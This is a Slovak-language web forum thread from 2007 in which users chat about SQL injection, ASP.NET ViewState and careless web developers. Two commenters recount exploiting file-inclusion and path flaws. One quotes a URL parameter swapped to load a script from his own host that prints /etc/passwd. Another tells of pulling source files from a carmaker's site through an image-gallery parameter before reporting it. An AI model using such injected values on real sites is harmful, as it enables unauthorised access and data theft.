|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
rch
Od: rch
|
Pridané:
14.2.2007 9:57
Tak proti SQL injection sa dá pomerne jednoducho chrániť, ak sa kontrolujú reťazce, ktoré púšťame k SQL serveru, nie?
Foldre - no na tie netreba zabudnúť. A ASP.NET pozná tzv. ViewState, ktoré šifrovaním stavu obsahu a unikátnymi identifikátormi vie rozpoznať postback, v ktorom niečo nie je v poriadku...
|
|
quix
Od: quix
|
Pridané:
14.2.2007 10:31
sql injecton je naozaj krasna vec, ale to mas tak.. cim viac rychlokvasenych pisalkov v akomkolvek jazyku tym hlupejsie chyby. :D staci kupit knihu typu "rychlo a lahko na vlastny e-shop" a dovidenia
|
|
debian
Od: debian
|
Pridané:
14.2.2007 11:24
hackthissite.org :)
|
|
thriler
Od: thriler
|
Pridané:
14.2.2007 15:07
No ked len 70% tych 91% znie uz lepsie, ale aj tak dost male cislo. Ale vlastne ked si zoberieme ze na niektorych servroch bezi akurat hovno a je otvoreny akurat tak port 80, tak tych 10% sa tam da nasustat.
|
|
qaws
Od: qaws
|
Pridané:
14.2.2007 16:09
To sa pocita aj chyba servera, alebo iba zranitelnost (chyba), ktoru ja spravim pri pisani kodu?
|
|
Uhlik
Od: Uhlik
|
Pridané:
14.2.2007 16:26
len chyba kodu stranky ... uz som zazil aj take, ze sa includoval skript z $_GET premennej, takze stacilo zamenit ?id=download.php trebars ?id=http://moj_webka/hack.php, kde bolo "echo('/etc/passwd')" a zoznam uzivatelov bol na svete :D ... a kym dotycnemu taky zoznam neukazes, tak ti bude omielat stale dookola, ze jeho kod nie je vobec deravy ;) ...
|
|
Uhlik
Od: Uhlik
|
Pridané:
14.2.2007 16:28
este aby som tu nebol zbuzerovany za to echo, tak to je prosim pekne len ako ilustracny kod ... nechcel som tu cmarat navody pre script kiddies ...
|
|
Bozz
Od: Bozz
|
Pridané:
14.2.2007 21:05
co to tu placas... na co sa hrajes.. myslis ze ked vies trochu pisat stranky.. takze druhy to tiez vedia.. ked pises tak to aj preloz pre laikov ako som ja poprosim
|
|
uhm
Od: uhm
|
Pridané:
15.2.2007 10:01
Umri.
|
|
localhost
Od: localhost
|
Pridané:
14.2.2007 21:48
podobnu chybu som aj ja celkom nahodou objavil na SK/CZ strankach jednej nemenovanej svetovej automobilky.Uplne banalna chyba sposobila, ze som velmi jednoduchym sposobom mohol postahovat zdrojove subory.Tak som aj postahoval co sa dalo, ale kedze nie som svina, nijako som to nezneuzil a radsej som im napisal nech si to daju pekne do poriadku.
|
|
Bozz
Od: Bozz
|
Pridané:
14.2.2007 23:19
ako?
|
|
localhost
Od: localhost
|
Pridané:
15.2.2007 9:15
...ako som napisal, cez podobnu chybu o ktorej pisal aj uhlik.
Konkretne tam mali galeriu v ktorej sa nazov obrazku ktory sa ma zobrazit prenasal v URL (GET parameter), ja som namiesto nazvu obrazku zadal nazvy suborov ktore som chcel :)
|